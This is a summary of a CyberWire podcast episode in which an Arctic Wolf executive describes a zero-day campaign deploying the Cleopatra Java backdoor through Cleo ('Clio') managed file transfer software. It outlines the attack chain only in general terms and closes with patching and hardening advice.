CyberWire Daily – Episode: Cleo’s Trojan Horse [Research Saturday]

Release Date: February 8, 2025
Host: Dave Bittner
Guest: Mark Manglicmot, Senior Vice President of Security Services at Arctic Wolf
Research Discussed: Cleopatra's Shadow: A Mass Exploitation Campaign Deploying a Java Backdoor through Zero-Day Exploitation of Clio MFT Software

Introduction

In this episode of CyberWire Daily's Research Saturday, host Dave Bittner engages in an in-depth discussion with Mark Manglicmot from Arctic Wolf. The focus is on a significant cybersecurity threat involving the exploitation of a zero-day vulnerability in Clio's Managed File Transfer (MFT) software, leading to the deployment of a sophisticated Java-based backdoor named Cleopatra.

Overview of the Threat Campaign

Mark Manglicmot begins by outlining the discovery made by Arctic Wolf's Threat Intelligence team on December 10. They identified a novel mass exploitation campaign targeting Clio’s MFT products, a critical tool for business-to-business supply chain integration software.

Mark Manglicmot [02:24]: "The research we're discussing today is titled Cleopatra's Shadow: A Mass Exploitation Campaign Deploying a Java Backdoor through Zero-Day Exploitation of Clio MFT Software."

Technical Analysis

The attackers exploited a zero-day vulnerability, CVE2024-50623, in Clio's MFT software, which affects both Windows and Linux versions of Harmony, vltrader, and Lexicom. The execution chain was notably complex, involving:

1. Obfuscated PowerShell Scripts: Initial malicious scripts executed through PowerShell.
2. Java Loader: Downloaded and executed a Java Archive (JAR) file.
3. Cleopatra Backdoor: A stealthy Java-based backdoor that facilitated further malicious activities.

Mark Manglicmot [04:37]: "The payload creates and runs a JAR file through the Clio software using Clio Autorun, automatically triggering predefined processes or scripts."

Attacker Profile

The campaign is attributed to a new threat group known as Termite, which has also targeted similar supply chain management software like Blue Yonder in previous attacks. Unlike some sophisticated groups that continuously evolve their tactics, Termite prefers using established methods effectively.

Mark Manglicmot [05:57]: "They're using older types of ransomware. If they can have an effective attack through simple means, they'll do that without trying too hard."

Mitigation and Response

Arctic Wolf took proactive steps to mitigate the threats posed by this campaign:

• Containment: Identifying and isolating affected hosts to prevent the spread of ransomware.
• Cleanup: Removing suspicious files from Clio software directories and disabling the Autorun feature.
• Configuration Hardening: Restricting file system commands to enhance security.

Mark Manglicmot [11:27]: "If you see anything that's happening on a host that looks like ransomware, we'll reach out and contain those devices so that nothing else spreads."

Broader Implications and Lessons Learned

This incident underscores a growing trend of targeting MFT software, which serves as a gateway to numerous connected companies within a supply chain. Key takeaways include:

• Vulnerability Management: The critical importance of applying patches promptly to mitigate exploit risks.
• Access Controls: Strengthening user and administrative privileges to limit potential attack vectors.
• Cross-Platform Security: Ensuring robust monitoring and security controls across both Windows and Linux systems.

Mark Manglicmot [12:56]: "Vulnerability management still is one of the most important things for companies to focus on."

Recommendations

Organizations using Clio MFT software should adopt the following immediate actions to safeguard their systems:

1. Apply the Latest Patch: Upgrade to Clio version 5.8.0.24 to address the identified vulnerabilities.
2. Harden Autorun Settings: Disable or restrict the Autorun feature within Clio to prevent automatic execution of malicious scripts.
3. Review Access Controls: Implement strict access privileges and monitor administrative privileges closely.
4. Enhance Security Monitoring: Deploy comprehensive security monitoring solutions to detect and respond to suspicious activities promptly.

Mark Manglicmot [15:26]: "Number one, apply the latest patch. That's the most important thing you can do."

Unique Aspects of the Cleopatra Campaign

What sets the Cleopatra campaign apart is its methodical approach to stealth and persistence. Unlike previous "smash and grab" tactics, Termite employs obfuscation and stealth to maintain prolonged access within targeted networks, allowing for extensive reconnaissance and selective ransomware deployment.

Mark Manglicmot [16:24]: "They were trying to be a little bit stealthy with how they did things, which is a bit of an evolution on some of these managed file transfer attacks."

Conclusion

The Cleopatra campaign highlights the evolving nature of cyber threats targeting supply chain integration tools. It emphasizes the necessity for organizations to maintain rigorous vulnerability management practices, implement robust access controls, and continuously monitor their systems for unusual activities. By adhering to these best practices, companies can significantly reduce their risk of falling victim to such sophisticated exploitation campaigns.

Mark Manglicmot [17:51]: "You have to rely on those companies to make sure that they're developing patches and you apply them."

CyberWire Daily ensures that listeners stay informed about the latest cybersecurity threats and mitigation strategies. For more detailed insights and resources related to this episode, please refer to the Show Notes.

Notable Quotes:

• Mark Manglicmot [04:37]: "The payload creates and runs a JAR file through the Clio software using Clio Autorun, automatically triggering predefined processes or scripts."
• Mark Manglicmot [05:57]: "They're using older types of ransomware. If they can have an effective attack through simple means, they'll do that without trying too hard."
• Mark Manglicmot [12:56]: "Vulnerability management still is one of the most important things for companies to focus on."
• Mark Manglicmot [16:24]: "They were trying to be a little bit stealthy with how they did things, which is a bit of an evolution on some of these managed file transfer attacks."
• Mark Manglicmot [17:51]: "You have to rely on those companies to make sure that they're developing patches and you apply them."

Additional Resources:

For a comprehensive understanding of the Cleopatra campaign and Arctic Wolf's research, visit the CyberWire Show Notes or access the full research report titled Cleopatra's Shadow.